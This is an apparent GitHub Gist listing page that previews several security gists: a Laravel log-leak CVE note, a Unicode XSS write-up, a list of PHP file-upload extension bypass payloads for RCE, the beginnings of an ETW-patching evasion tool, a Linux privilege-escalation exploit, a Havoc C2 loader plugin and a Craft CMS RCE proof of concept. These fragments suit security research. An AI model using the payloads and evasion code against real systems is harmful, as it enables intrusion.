Skip to content

Instantly share code, notes, and snippets.

View petarbojic's full-sized avatar

petarbojic

View GitHub Profile
@whiteman007
whiteman007 / CVE-2024-29291
Last active June 4, 2024 14:15
CVE-ID: CVE-2024-29291
Description:
A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.
Additional Information:
None.
@irsdl
irsdl / urlhostname_test.js
Created March 14, 2024 10:54
To evaluate how `URL(url).hostname` in JS handles discarded characters and character conversions in domain names.
// by @irsdl
// This script identifies anomalies in how JS parses the URL using `URL(url).hostname`:
// 1- Characters that are ignored when present in the domain name.
// 2- Characters that can replace ASCII characters in domain names and still be parsed correctly. In here we want letter S in `soroush.me`
// You can try running this script in your browser's dev console or at https://www.jdoodle.com/execute-nodejs-online/
// I am sure this must have been looked at before but I cannot find a reference
for (let i = 0; i <= 0xFFFF; i++) {
const unicodeChar = String.fromCharCode(i);
const urlString = `http://sorous${unicodeChar}h.me/blog/`;
@paj28
paj28 / index.md
Last active April 18, 2025 12:49

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

@7h3h4ckv157
7h3h4ckv157 / .php
Last active December 2, 2023 10:01
Best RCE payloads (PHP file upload) that I found on the Internet
php%20
php%0a
php%00
php%0d%0a
php/
php.\
phar
php....
pHp5....
phpJunk123png
@Dump-GUY
Dump-GUY / GetR2RMethodDisassembly.ps1
Created November 20, 2023 17:06
# Get IL code and pre-compiled native code disassembly of R2R Assembly methods
# Using AsmResolver + Iced + PowerShell
# More Info Here: https://docs.washi.dev/asmresolver/guides/peimage/ready-to-run.html
# Loading dependecies
[System.Reflection.Assembly]::LoadFrom([System.IO.Path]::GetFullPath(".\libs\AsmResolver\net6.0\AsmResolver.PE.dll")) | Out-Null
[System.Reflection.Assembly]::LoadFrom([System.IO.Path]::GetFullPath(".\libs\AsmResolver\net6.0\AsmResolver.DotNet.dll")) | Out-Null
[System.Reflection.Assembly]::LoadFrom([System.IO.Path]::GetFullPath(".\libs\Iced\netstandard2.1\Iced.dll")) | Out-Null
$filePath = [System.IO.Path]::GetFullPath(".\test_files\CompileDecoy_ReplaceReal_SC_Original.dll") # R2R Assembly Sample
@seahop
seahop / PatchETW.cs
Last active February 17, 2024 14:22
ETW patching in C#. Based on https://www.phrack.me/tools/2023/04/10/Patching-ETW-in-C.html
using System;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using DInvoke.DynamicInvoke;
namespace PatchETW
{
public static class Native
{
@win3zz
win3zz / GameOver(lay).md
Last active January 3, 2025 05:42
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629) 
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {
@ShipkaChalk
ShipkaChalk / gist:629fdc42dad781776d2007fc502188f3
Last active April 17, 2025 17:45
Plex Hetzner workaround using Docker.

Hey, here is how you can route all plex traffic via wireguard out of another VPS, this can be used for any container but was inspired by the recent Hetzner block Plex put in place.

And no not all of us are using it for nefarious means, sometimes people don't have room for a home server.

Why docker? I prefer it as it keeps items separated and cleaned. It also allows for quickly moving configurations around from server to server if need be.

  1. Get yourself a VPS. ( If your VPS has a built in firewall like IONOS (but don't use Ionos), then you need to allow through the ports specified in the VPS docker compose)
  2. Install docker ( Do not use snap, follow their offical directions otherwise you may have docker related issues. )
  3. Create this docker-compose.yml
@jakobfriedl
jakobfriedl / Shhhavoc.py
Last active February 27, 2024 12:15
Shhhloader integration for Havoc
#!/usr/bin/env python
# -*- Coding: UTF-8 -*-
# Author: Jakob Friedl
# Created on: Mon, 16. Oct 2023
# Description: Shhhloader support for Havoc C2 framework
# Usage: Load this script into Havoc: Scripts -> Scripts Manager -> Load to create Shhhloader Tab
import os, sys, subprocess
import threading
import havoc
@to016
to016 / CVE-2023-41892-POC.md
Last active November 27, 2024 18:01
CVE-2023-41892 (Craft CMS Remote Code Execution) - POC

This Gist provides a Proof-of-Concept (POC) for CVE-2023-41892, a Craft CMS vulnerability that allows Remote Code Execution (RCE).

Overview

CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system. Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

POC

This POC is depending on writing webshell, so finding a suitable folder with writable permission is necessary.